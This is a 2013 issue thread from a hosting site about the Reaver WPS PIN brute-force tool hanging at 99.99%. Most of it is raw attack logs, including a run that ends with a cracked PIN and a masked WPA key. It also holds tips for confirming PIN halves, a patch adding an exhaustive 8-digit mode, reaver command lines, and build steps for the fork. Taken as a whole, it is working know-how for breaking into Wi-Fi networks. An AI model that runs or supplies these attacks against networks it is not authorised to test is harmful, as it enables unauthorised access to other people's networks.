[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 11110718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending....
      ..... WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2013-05-29 09:59:08 (11 seconds/pin)
[+] Trying pin 91040004
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message     > (If You receive the M5 indicates that you have the 4 first right digits.) 
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040008
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.19% complete @ 2013-05-29 09:59:44 (11 seconds/pin)
[+] Trying pin 91040010
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040017

Wait and you will see the count jumps to 90.00% with no bug anymore. and this time reaver will try every possible combination. 

after +-2 hours
........
[+] Trying pin 91040893
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message  > (DONE!!!)
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1092 seconds
[+] WPS PIN: '91040893'
[+] WPA PSK: 'xxxxxxxxxxxxx'
[+] AP SSID: 'TP-LINK'


* To ensure that you have the right first 4 digits, you need to check two thing

First You have to be able to receive the M5 Message, this indicate that first half of pin are Right
Second when you set the pin, the percentage should get to 90% 

Hope works to you guys like worked for me. If you still get stuck do all over again, happens to me when the signal was weak..
you can try this before or after the Stefano's Solution.
 That it, Good Luck
And Remember only test AP with permission of the owner.  :)
Jun 18, 2013
#52 c.sala....@gmail.com
Hi,

Some months ago I jumped directly into this issue and, after seeing some of the comments here, I went directly into downloading the code and fixing the issue.

At the moment I have a completely functional version with the following features:

1. Fixed the 99.9% never ending loop: If the end is reached without success, the application exits as expected. (before it continued until it was interrupted or killed)
2. Added an exhaustive option (--exhaustive, -X) which uses "set_p1(p1_index) + set_p1(p2_index)" instead of "set_p1(p1_index) + set_p2(p2_index)" to force covering all possible combinations. This ensures that the PIN is found even if it does not follow the "checksum" rules. However this makes of corse the process much longer.
3. If the -X option is not provided, the application runs as usual. However, if it reaches the end without having found a valid PIN, it gets the first half of the PIN which has been already found and restarts scanning for the second one in exhaustive mode. This makes the overall process much longer in the worst scenarios, but this ensures that the PIN is finally found in all cases (if the signal is strong enough).
4. Added two options: (--p1-index, -1) and (--p2-index, -2) which allows setting an initial value for the respective indexes. Useful if you lost a previous session.
5. Added some "aesthetic" improvements, such as displaying the elapsed time and the estimated remaining time in AdBhCmDs format, or displaying each time the Pin counter and the Max Pin attempts (in verbose mode).


And, here you have a snapshot of the new output, making use of the new "-2" option as an example, including the instant in which the mode changes from "checksum" to "exhaustive" (notice how the "Max pin attempts" increases to 20000 and how Pin count goes down to 10001) and displaying the elapsed and remaining time:

# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -v -S -t7 -d 10 -p 4247 -2 998

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Starting Cracking Session. Pin count: 10998, Max pin attempts: 11000
[+] Trying pin 42479970.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 42479987.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 42471234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 42470000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 42470123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 42471111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d0h1m18s.
[+] Trying pin 42472222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] Trying pin 42473333.
[+] Pin count advanced: 10006. Max pin attempts: 20000
[+] Trying pin 42474444.
[+] Pin count advanced: 10007. Max pin attempts: 20000
[+] Trying pin 42475555.
[+] Pin count advanced: 10008. Max pin attempts: 20000
[+] Trying pin 42476666.
[+] Pin count advanced: 10009. Max pin attempts: 20000
[+] 50.04% complete. Elapsed time: 0d0h2m22s.
[+] Estimated Remaining time: 1d9h18m12s
[+] Trying pin 42477777.
[+] Pin count advanced: 10010. Max pin attempts: 20000


The weird thing about all this is that I already sent two messages to the project owners asking for commit permissions to upload my patch and I got absolutely NO response from them. At all!

I am not a big friend of the "forking" concept, but man, it's been more than one year since the last signs of life from the committers, and it's a pitty to have such a useful project just abandoned where there are plenty of issues and volunteers to solve them!
May we think about it?
Jun 23, 2013
#53 erhance...@gmail.com
carles, in case you don't get a response from the original developers can you share the your source code changes here? It seems like you created a better version and there is no need to reinvent the wheel
Jun 29, 2013
#54 c.sala....@gmail.com
Hi,

I received several requests about those modifications, so I made them public in pastebin: http://pastebin.com/EcWw7e7n

Here you have the instructions to install the changes in linux:
- Download a fresh version of the code (revision 113).
- go to this link: http://pastebin.com/EcWw7e7n
- Paste the contents into a patch file inside the trunk folder (let's say, reaver-wps.patch)
- execute the following command from inside the trunk folder (without quotes): "patch -p1 < reaver-wps.patch"
- follow the reaver build and installation instructions as usual.

If you have any issues, please feel free to send me an e-mail and I'll try to give you a hand.

Regards,
Carles
Jul 2, 2013
#55 Lamonafi...@gmail.com
Hi¡ great work Carles.sala, it will be interesting if you could made a mod with your changes so the lazy noobs like me that dont know nothing about programming could install the reaver mod instead of doing all that anoying work¡ you could load it in rapidshare or similar.

Thanks in advance.

 
Jul 2, 2013
#56 saeed.y2...@gmail.com
Yeah, I agree with Lamonafi,
I really appreciate If you do that.

Jul 6, 2013
#57 c.sala....@gmail.com
Hi,

Some of you reported having problems with the patch (apparently pastebin modifies slightly the pasted text (white spaces and so on) and then patch does not pick up the changes as expected).

Therefore, I finally opted for creating a fork repository (http://code.google.com/p/reaver-wps-fork/) where this issue is already fixed.

I still didn't have time to prepare and upload the binaries, but the version is ready to download and install.

Here you have the steps which you can just copy/paste (run as root!):

NOTE: If you are running ubuntu, make sure you have libsqlite3-dev installed:
# apt-get install libsqlite3-dev

# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-only
# cd reaver-wps-fork-read-only/src
# ./configure
# make distclean && ./configure #(you can skip this step if you never installed reaver before)
# make
# make install

If you have any doubts, or you want to contribute in the project with your own changes, please feel free to contact me.

Regards,
Carles
Jul 8, 2013
#59 Lamonafi...@gmail.com
Hi c.sala¡ I test your program today , works fine but sessions cant be saved. What comand should I use if i want to start the pin count in 5267 3000 for example? (I know the first 4 digits).
Thanks.
Jul 24, 2013
#60 J0J0...@gmail.com
i installed the patch  "patch -p1 < reaver-wps.patch" and now reaver doesnt compile at all. how do i uninstall?
Aug 1, 2013
#63 rbel...@gmail.com
I installed the patch, this is the output


[+] Waiting for beacon from XX:C6:XX:62:F2:XX
[+] Associated with XX:C6:XX:62:F2:XX (ESSID: xxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 12340002.
[+] Pin count advanced: 10002. Max pin attempts: 11000
[+] Trying pin 12342228.
[+] Pin count advanced: 10003. Max pin attempts: 11000
[+] Trying pin 12343331.
[+] Pin count advanced: 10004. Max pin attempts: 11000
[+] Trying pin 12344444.
[+] Pin count advanced: 10005. Max pin attempts: 11000
[+] 90.95% complete. Elapsed time: 0d0h1m9s.
[+] Trying pin 12345557.
[+] Pin count advanced: 10006. Max pin attempts: 11000
[+] Trying pin 12346660.
[+] Pin count advanced: 10007. Max pin attempts: 11000
[+] Trying pin 12347773.
[+] Pin count advanced: 10008. Max pin attempts: 11000
[+] Trying pin 12348886.
[+] Pin count advanced: 10009. Max pin attempts: 11000
[+] Trying pin 12349999.
[+] Pin count advanced: 10010. Max pin attempts: 11000
[+] 91.00% complete. Elapsed time: 0d0h2m7s.
[+] Estimated Remaining time: 0d3h1m30s
[+] Trying pin 12340019.
[+] Pin count advanced: 10011. Max pin attempts: 11000
[+] Trying pin 12340026.
[+] Pin count advanced: 10012. Max pin attempts: 11000
[+] Trying pin 12340033.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12340033.
[+] Pin count advanced: 10013. Max pin attempts: 11000
[+] Trying pin 12340040.
[+] Pin count advanced: 10014. Max pin attempts: 11000
[+] 91.04% complete. Elapsed time: 0d0h3m5s.
[+] Estimated Remaining time: 0d3h50m4s
[+] Trying pin 12340057.
[+] Pin count advanced: 10015. Max pin attempts: 11000
[+] Trying pin 12340064.
[+] Pin count advanced: 10016. Max pin attempts: 11000
[+] Trying pin 12340071.
[+] Pin count advanced: 10017. Max pin attempts: 11000
[+] Trying pin 12340088.
[+] Pin count advanced: 10018. Max pin attempts: 11000
[+] Trying pin 12340095.
[+] Pin count advanced: 10019. Max pin attempts: 11000
[+] 91.08% complete. Elapsed time: 0d0h4m3s.
[+] Estimated Remaining time: 0d2h59m51s
[+] Trying pin 12340101.
[+] Pin count advanced: 10020. Max pin attempts: 11000
[+] Trying pin 12340118.
[+] Pin count advanced: 10021. Max pin attempts: 11000
[+] Trying pin 12340125.
[+] Pin count advanced: 10022. Max pin attempts: 11000
[+] Trying pin 12340132.
[+] Pin count advanced: 10023. Max pin attempts: 11000
[+] Trying pin 12340149.
[+] Pin count advanced: 10024. Max pin attempts: 11000
[+] 91.13% complete. Elapsed time: 0d0h5m2s.
[+] Estimated Remaining time: 0d2h58m56s
[+] Trying pin 12340156.
[+] Pin count advanced: 10025. Max pin attempts: 11000
[+] Trying pin 12340163.
[+] Pin count advanced: 10026. Max pin attempts: 11000
[+] Trying pin 12340170.
[+] Pin count advanced: 10027. Max pin attempts: 11000
[+] Trying pin 12340187.
[+] Pin count advanced: 10028. Max pin attempts: 11000
[+] Trying pin 12340194.
[+] Pin count advanced: 10029. Max pin attempts: 11000
[+] 91.17% complete. Elapsed time: 0d0h5m59s.
[+] Estimated Remaining time: 0d2h58m1s
[+] Trying pin 12340200.
[+] Pin count advanced: 10030. Max pin attempts: 11000
[+] Trying pin 12340217.
[+] Pin count advanced: 10031. Max pin attempts: 11000
[+] Trying pin 12340224.
[+] Pin count advanced: 10032. Max pin attempts: 11000
[+] Trying pin 12340231.
[+] Pin count advanced: 10033. Max pin attempts: 11000
[+] Trying pin 12340248.
[+] Pin count advanced: 10034. Max pin attempts: 11000
[+] 91.22% complete. Elapsed time: 0d0h6m57s.
[+] Estimated Remaining time: 0d2h57m6s

waiting for reaver to finish
Aug 2, 2013
#64 rbel...@gmail.com
[+] Trying pin 12349975.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 12349982.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] 100.00% complete. Elapsed time: 0d3h26m13s.
[+] Estimated Remaining time: 0d3h26m13s
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 12341234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 12340000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 12340123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 12341111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] Trying pin 12342222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d3h27m29s.
[+] Estimated Remaining time: 0d3h27m29s


why it restarts at 50%?
Aug 3, 2013
#67 c.sala....@gmail.com
Hi,

#60 and #62: I already said in my comment #57 that the patch was messed up by pastebin and that it didn't work as expected.
Please checkout the version from reaver-wps-fork project (http://reaver-wps-fork.googlecode.com/svn/trunk/), which does compile properly.

#64: I explained that in comment #52. The 99.99% problem appeared because the WPS pin which you are trying to crack does not follow the checksum rule.
Therefore, in the new version of reaver-wps, when it reaches the end of the checksum pins it assumes that yours is "non standard" and jumps automatically to the exhaustive mode, which brute forces all 8 digits instead of brute forcing 7 of then and calculating the last one using a checksum.

This has two big consequences:
On one side, chances of matching the pin increase dramaticallty.
However, on the other side, the crack time for one of those non-standard pins can be of several days instead of several hours (bear in mind that, before, this kind of pins could not be creacked at all using reaver "as-was").

I hope this clears up your doubts.
Aug 9, 2013
#70 sairesea...@gmail.com
Thank you Carles,

I do not have Internet at home, making installation of this patch impossible.

Can you rap it up and upload it somewhere¿ 

Again thank you!
Aug 12, 2013
#71 ohnostra...@gmail.com
Hi c.sala! Can you please make possible for reaver to save changes and restart the same session,pls pls can you do this?

thanks for great job!
Aug 12, 2013
#72 sairesea...@gmail.com
how to install this patch onto a live usb installation?

root@kali:~# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-only

Checked out revision 3.
root@kali:~# 
root@kali:~# cd reaver-wps-fork-read-only/src
root@kali:~/reaver-wps-fork-read-only/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables... 
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
root@kali:~/reaver-wps-fork-read-only/src#
Aug 13, 2013
#73 sairesea...@gmail.com
how do I install this without Internet connexion?
Aug 16, 2013
#74 lord.bla...@gmail.com
Hi Carles. First, thanks for doing the patched version!

Downloaded & installed it (v3) as per http://code.google.com/p/reaver-wps-fork/ Runs fine for a bit, but then throws 'Floating point exception' after a percent-complete line, see cmdline & output below. Any ideas? Let me know if more info would help.

reaver -i mon0 -b 55:66:77:88:99:AA -vv -c 1 -d 4 -t 10 -x 305 -S  -p 8983 -X -2 19
...
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 50.23% complete. Elapsed time: 0d0h8m5s.
Floating point exception




Aug 17, 2013
#75 sairesea...@gmail.com
same as #74


[+] Trying pin 12343126.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 93.82% complete. Elapsed time: 0d0h2m33s.
Floating point exception

Aug 17, 2013
#76 sairesea...@gmail.com
syntax was...

reaver -i mon0 -c 11 -b BC:76:70:E0:71:EC -vv -p 1234 -2 310
Aug 18, 2013
#77 lord.bla...@gmail.com
OK, a bit more info to add to #74:
1. The floating point error is fairly rare, what's more common is to simply stop without error (or answer).
2. The problem only happens immediately after the "% complete. Elapsed time: " line.
3. The problem seems to happen only after multiple WPS transaction fails.
Hope that helps!
Aug 20, 2013
#78 sairesea...@gmail.com
Yes, agree with #77 that the Floating point exception it is a rare thing and happens only (in my case) within the first minute of a session. The last time it did it, the syntax was very simple and without any new arguments (reaver -i mon0 -c 11 -b BC:76:70:XX:XX:XX -vv).

Getting back to the 99% bug... The fallowing may or may not be related.

Reaver 1.4 has problems with certain routers. Namely Huawei routers (BSSID BC:76:70: ...)

1. Does not detect the fist correct four numbers of the PIN, instead giving a false positive with 1234, or any four digits you give it, and return the "received M5 message".

2. The first problem causes the 99% bug and repeats the last key at the end.

Solution: Reaver 1.3

With a very simple syntax in reaver 1.3 (reaver -i mon0 -c 11 -b BC:76:70:DD:0A:28 -vv) I retrieved the information! I did EVERYTHING spending DAYS trying with reaver 1.4 and this version (1.4 fork r3) without any success.

@ Carles

any chance for you to include a '-3' argument in the next version? 
-3 as in 'operate like reaver 1.3'


Aug 24, 2013
#81 dave...@gmail.com
Hi Carles, "Floating point exception" here too.
Aug 29, 2013
#82 ushpacor...@gmail.com
i have the same problem here, and seems to happen only after multiple WPS transaction fails, it just stops without answer. im now trying with reaver 1.3 that seems to be working fine.
Aug 30, 2013
#83 ushpacor...@gmail.com
hello, as i said before reaver 1.3 is working but i still have the 99.99% problem because the first 4 numbers are independent from the others, is arbitrary and is not in the numbers that reaver tries for the second half. im basically were i  started, now reaver actually gets the true four first numbers (no M5 false positive) but get stuck at 99.99% and the fork isnt working either, does anyone knowns how to solve the 99% loop?

Aug 30, 2013
#84 brock1...@gmail.com
I've personally had this problem both with my Alfa 802.11 g/n (the g/n unit
came with my Reaver Pro) and an older Alfa 802.11 b/g USB device (RTL8187).
However my Inetel Centrino Ultimate-n 6300 has no problems on the same
laptop. I've also noticed that all three cards can connect to any of their
compatible access point standards, can send deauth packets but the Alfa's
cannot capture hand shakes using fern, wifite or even manually using tshark
or cowpatty (cowpatty just produces empty files). Not sure if that helps
give insight in to the 99.99% problem or not. To be clear, the Alfa's will
only make it to 99.99% but the Intel will work every time. (Backtrack 5r3,
Kali)
Today (2 hours ago)
#85 c.sala....@gmail.com
Hi all,

Sorry for not responding to your comments (which I really appreciate), but it has been a while since I last came to this thread and I still hadn't seen them.

@Chris: I'm glad to see that you managed to install it without internet, however I cannot give a solution for the 1.3 idea. For sure it could be done, but I suspect it would be a hard thing to implement, and probably not as worth as just looking forward and fixing the current issues. Anyway, I will take 1.3 version as a reference when trying to fix them.

@Steven and the others with the "Floating point Exception" error: There's already an issue created in the fork repo: http://code.google.com/p/reaver-wps-fork/issues/detail?id=1
Would you mind following the issue there and uploading any relevant info? I must say that I had few time to work on it, and actually I could not manage to reproduce the error with any of my routers, but I'll do what I can to fix it.

@Mali: Sure, I will try to fix this. Would you mind creating an issue for it in the new repo?
Then it will be easier to follow up.

Regards,
Carles 
Sign in to add a comment

Powered by Google Project Hosting